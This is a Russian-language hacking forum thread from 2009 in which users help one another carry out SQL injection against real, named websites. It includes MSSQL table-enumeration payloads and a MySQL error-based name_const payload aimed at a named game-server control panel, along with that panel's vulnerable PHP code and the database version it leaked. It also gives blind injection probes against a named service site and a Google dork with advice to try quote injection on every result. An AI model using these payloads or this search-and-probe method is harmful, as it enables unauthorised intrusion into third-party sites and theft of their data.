ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11001  
Старый 28.12.2009, 03:36
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:

Цитата:
commentary.asp?article=(%53elect+top+1+table_name+ from+information_schema.tables+where+table_name+no t+in+('blabla1','blabla2','blabla3',.............. ....'blabla50')
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
 
Ответить с цитированием

  #11002  
Старый 28.12.2009, 03:48
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
попробуй отсылать данные каким нить стороним софтом или скриптом, так можно будет обойти ограничение со стороны клиента
 
Ответить с цитированием

  #11003  
Старый 28.12.2009, 04:13
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

пробовал webscarab но оно тоже работает через браузер ((
 
Ответить с цитированием

  #11004  
Старый 28.12.2009, 12:57
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Цитата:
Сообщение от YuNi|[c  
так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+Х+table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.
 
Ответить с цитированием

  #11005  
Старый 28.12.2009, 14:09
Аватар для KNR
KNR
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669

Репутация: 24
По умолчанию

Код:
http://wow.teletoria.ru/ACP2/index.php?modul=charedit
Не могу найти где Проделать Инъекцию ((
Код:
Notice: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (`account` = 3181) and (`online` = 0) LIMIT 1' at line 1 in /var/www/html/ACP2/modules/charedit.php on line 6

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/ACP2/modules/charedit.php on line 7
Вот код
PHP код:
 if (mysql_num_rows($res) == 0) { echo 'Not select character!'; }
  else {
     
$cres   mysql_fetch_array($res);
          if ((
$cres['race'] == 1) or ($cres['race'] == 3) or ($cres['race'] == 4) or ($cres['race'] == 7) or ($cres['race'] == 11))
          
$char_race 1//Alliance
     
if (($cres['race'] == 2) or ($cres['race'] == 5) or ($cres['race'] == 6) or ($cres['race'] == 8) or ($cres['race'] == 10))
          
$char_race 2//Horde
     
$money  $cres['money'];
     
$char_lvl $cres['level']; 
 
Ответить с цитированием

  #11006  
Старый 28.12.2009, 15:57
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://acp.svn.beanstalkapp.com/projects/ACP2/modules/charedit.php

PHP код:
if ($_POST['character'] >= 0) {
  
$c_connect mysql_connect($c_ip$c_userdb$c_pw);
  
mysql_select_db($c_db$c_connect);
  
mysql_query("SET NAMES '$encoding'");  
  
$res mysql_query("SELECT `name`, `class`, `guid`, `race`, `online`, `gender`, `level`, `money`, `xp` FROM `characters` WHERE (`guid` = ".$_POST['character'].") and (`account` = ".$_SESSION['user_id'].") and (`online` = 0) LIMIT 1") or trigger_error(mysql_error()); 
Вот здесь $_POST['character']

character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+

Цитата:
Notice: Duplicate column name '5.0.51a-24-log' in /var/www/html/ACP2/modules/charedit.php on line 6
 
Ответить с цитированием

  #11007  
Старый 28.12.2009, 17:18
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Цитата:
Сообщение от RulleR  
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+Х+table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.
спс большое очень помогло.
при запросе
PHP код:
(%53elect+top+1+Post_count+from+Total)-- 
всегда ответ одинаковый
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
где может быть ошибка

Последний раз редактировалось YuNi|[c; 28.12.2009 в 22:11..
 
Ответить с цитированием

  #11008  
Старый 29.12.2009, 06:35
Аватар для Bramin
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

Цитата:
Сообщение от v1d0qz  
YuNi|[c
Просто видимо там ничего нету.
Я вот тоже решил первый раз выложить свой вопрос по иньекции.
h_ttp://www.dr service.ru/'
Никак немогу подобрать правильный запрос.
ну или тут
h_ttp://www.dr service.ru/service-centers/nn/NNovgorod/drservice52'/
это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
 
Ответить с цитированием

  #11009  
Старый 29.12.2009, 06:48
Аватар для v1d0qz
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию

Цитата:
Сообщение от Bramin  
это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
Ну если не знаешь, то зачем писать?
Для тренировки я использую методы по интересней А вообще то у меня уже свалка доступа к сайтам с посещаемостью не 1к уников в сутки))
Просто вопросы я чаще всего решаю сам, чем пишу на форуме, а крутить простые скули типа как ты говоришь inurl:index.php?id=1, не очень интересно.
зы. Для меня интерес в выведении допустим того же database(), а не сидеть перебирать таблички и смотреть что в них. Перебирать таблички уже с построенного запроса, это вообще практически ничему не учит. Так что, вот так вот

Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1+1='2/

Почему же не выводиться допустим когда вставляем version или другую подобную функцию.
http://www.dr service.ru/service-centers/nn/NNovgorod/drservice52/'and+substr ing(version(),1,1)='5/

Видимо потому что 6 утра и нужно спать)) Бо что-то уже совсем ничего не выводиться )))

Последний раз редактировалось v1d0qz; 29.12.2009 в 18:54..
 
Ответить с цитированием

  #11010  
Старый 29.12.2009, 09:32
Аватар для Bramin
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

Цитата:
Сообщение от v1d0qz  
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ